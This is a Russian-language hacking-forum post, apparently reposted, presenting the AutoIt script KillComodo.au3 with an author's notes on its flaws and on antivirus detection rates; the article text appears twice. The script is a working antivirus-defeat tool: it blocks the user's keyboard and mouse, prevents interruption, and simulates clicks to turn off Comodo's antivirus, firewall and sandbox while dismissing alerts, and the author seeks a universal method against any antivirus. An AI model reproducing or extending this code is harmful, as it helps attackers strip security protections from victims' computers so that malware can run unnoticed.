Рад, что на хакзоне наконец-то начили писать нормальные и актуальные статьи, вот наткнулся на одну интересную статейку:
Привет всем. Давно мучает идея, можно ли найти универсальный способ против любого антивируса?
И тут на глаза случайно попался довольно простой в обращении язык AutoIt v.3. Изначально язык предназначен для управления графическим интерфейсом Windows. Я так подумал, и решил, что с помощью него можно иммитировать нажатия мыши и отключать антивирусы пользовательским способом, как делают это обычные юзеры.
Первой жертвой я выбрал неизвестный мне ранее вирус Comodo (просто стоял у моей тёти на компьютере). Хочу сразу предоставить код KillComodo.au3:
Минусы и недочёты скажу сразу, проверял только на двух ОС - Windows 7 (x86) и Windows 8 (x64)
Минусы на семёрке:
-Проблема с выбором времени при отключении функций антивируса
-Программа не будет работать, если на рабочем столе включено автоматическое исчезание панели задач
-Когда пытался записать видео с работой скрипта - скрипт просто не смог запуститься, причём когда захват видео отключался, скрипт работал
Минусы на восьмёрке:
-Скомпилированная программа не запускается просто так, она требует запуск от имени администратора, когда же происходит запуск администратором, Comodo ругается на неё, хотя даёт выбор - запустить или нет. Но велика возможность того, что пользователь блокирует программу и задача не будет выполнена.
Также проверил программу на блокировку антивирусами на сайте
В общем, 3 антивируса из 46 признали KillComodo вирусом, и что странно, сам Comodo не в их числе.
Очень хотелось бы отзывов, предложений по поводу "можно ли дальше развивать данную идею?". Если это возможно, то хотелось бы найти единомышленников.
Источник, а также там можно связаться с автором:
Видео использования программы:
Привет всем. Давно мучает идея, можно ли найти универсальный способ против любого антивируса?
И тут на глаза случайно попался довольно простой в обращении язык AutoIt v.3. Изначально язык предназначен для управления графическим интерфейсом Windows. Я так подумал, и решил, что с помощью него можно иммитировать нажатия мыши и отключать антивирусы пользовательским способом, как делают это обычные юзеры.
Первой жертвой я выбрал неизвестный мне ранее вирус Comodo (просто стоял у моей тёти на компьютере). Хочу сразу предоставить код KillComodo.au3:
Код:
#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.8.1
Author: Ryder95
Script Function:
Отключает всю систему защиту Comodo Internet Security Premium
#ce ----------------------------------------------------------------------------
; Script Start - Add your code below here
Global $msg[4];Переменная для информации об окне оповещения
Break(0);Попытка отключения возможности отключения скрипта пользователем
If @OSVersion="WIN_7" then $WarnName="" ;Имя окна оповещения
If @OSVersion="WIN_8" then $WarnName="COMODO Оповещение об отключении компонента";Имя окна оповещения
BlockInput(1) ;Попытка отключить устройства ввода пользователя
Select ;Запуск Comodo
Case not WinExists("COMODO Internet Security Premium ");Если программа не запущена...
Run(@ProgramFilesDir & "\COMODO\COMODO Internet Security\cistray.exe --shortcut");...то запуск программы
AutoItSetOption("WinTitleMatchMode",3);Настройки поиска главного окна
WinWaitActive("COMODO Internet Security Premium ","",10);Ждём, когда активируется
Case not WinActive("COMODO Internet Security Premium ");Если не активна...
WinActivate("COMODO Internet Security Premium ");...то активируем главное окно
EndSelect
$main=WinGetPos("COMODO Internet Security Premium ") ;Получение позиций главного окна
sleep(500) ;Пауза (дать компьютеру успеть выполнить действие на экране)
MouseClick("left",$main[0]+Round($main[2]*0.8844),$main[1]+Round($main[3]*0.2948),1,100) ;Отключение защиты
sleep(5000) ;Пауза
MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+Round($main[3]*0.3137),1,100) ;Отключение антивируса
OffWarn();вызов функции, работающей с окном оповещения
WinActivate("COMODO Internet Security Premium ");Активируем окно Comodo
sleep(500) ;Пауза
MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+round($main[3]*0.4008),1,100) ;Отключение фаервола
OffWarn()
WinActivate("COMODO Internet Security Premium ") ;Активируем окно Comodo
sleep(500) ;Пауза
MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+round($main[3]*0.4877),1,100) ;Отключение Авто-Sandbox
OffWarn()
WinActivate("COMODO Internet Security Premium ") ;Активируем окно Comodo
sleep(500) ;Пауза
WinClose("COMODO Internet Security Premium ");закрываем главное окно
Func OffWarn();функция, работающая с окном оповещения
$s=WinWait($WarnName,"",5);Ждём появления оповещения
if @OSVersion="WIN_8" and $s=0 then Return
WinActivate($WarnName)
Select
Case @OSVersion="WIN_8"
$msg=WinGetPos($WarnName) ;Получаем координаты окна оповещения
Case @OSVersion="WIN_7"
$msg[0]=@DesktopWidth-462
$msg[1]=@DesktopHeight-round(@DesktopHeight*0.0666)-289
$msg[2]=462
$msg[3]=289
EndSelect
if $msg[0]+$msg[2]<=@DesktopWidth then ;Если окно оповещения не заходит за правую границу стола
MouseClick("left",$msg[0]+Round($msg[2]*0.9264),$msg[1]+Round($msg[3]*0.6989),1,100)
Else
MouseClick("left",@DesktopWidth-20,$msg[1]+Round($msg[3]*0.6989),1,100)
endif
sleep(500) ;Пауза
if @DesktopHeight-$msg[1]-$msg[3]>=round($msg[3]*0.044) Then ;Если меню снизу
if ($msg[0]>=0) and ($msg[0]+$msg[2]<=@DesktopWidth) then MouseClick("left",$msg[0]+Round($msg[2]*0.1233),$msg[1]+Round($msg[3]*1,006),1,100) ;Если окно оповещения не заходит за границы стола
if $msg[0]<0 then MouseClick("left",Round($msg[2]*0.0735),$msg[1]+Round($msg[3]*1,006),1,100) ;если окно за левой границей
if $msg[0]+$msg[2]>@DesktopWidth then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*1,006),1,100) ;если окно за правой границей
Else
if ($msg[0]>=0) and ($msg[0]+$msg[2]<=@DesktopWidth) then MouseClick("left",$msg[0]+Round($msg[2]*0.1190),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно оповещения не заходит за границы
if $msg[0]<0 then MouseClick("left",Round($msg[2]*0.0714),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно за левой границей
if $msg[0]+$msg[2]>@DesktopWidth then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно за правой границей
EndIf
sleep(500) ;Пауза
MouseClick("left",$msg[0]+round($msg[2]*0.6082),$msg[1]+round($msg[3]*0.9377),1,100)
EndFunc
Минусы и недочёты скажу сразу, проверял только на двух ОС - Windows 7 (x86) и Windows 8 (x64)
Минусы на семёрке:
-Проблема с выбором времени при отключении функций антивируса
-Программа не будет работать, если на рабочем столе включено автоматическое исчезание панели задач
-Когда пытался записать видео с работой скрипта - скрипт просто не смог запуститься, причём когда захват видео отключался, скрипт работал
Минусы на восьмёрке:
-Скомпилированная программа не запускается просто так, она требует запуск от имени администратора, когда же происходит запуск администратором, Comodo ругается на неё, хотя даёт выбор - запустить или нет. Но велика возможность того, что пользователь блокирует программу и задача не будет выполнена.
Также проверил программу на блокировку антивирусами на сайте
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
.В общем, 3 антивируса из 46 признали KillComodo вирусом, и что странно, сам Comodo не в их числе.
Очень хотелось бы отзывов, предложений по поводу "можно ли дальше развивать данную идею?". Если это возможно, то хотелось бы найти единомышленников.
Источник, а также там можно связаться с автором:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Видео использования программы: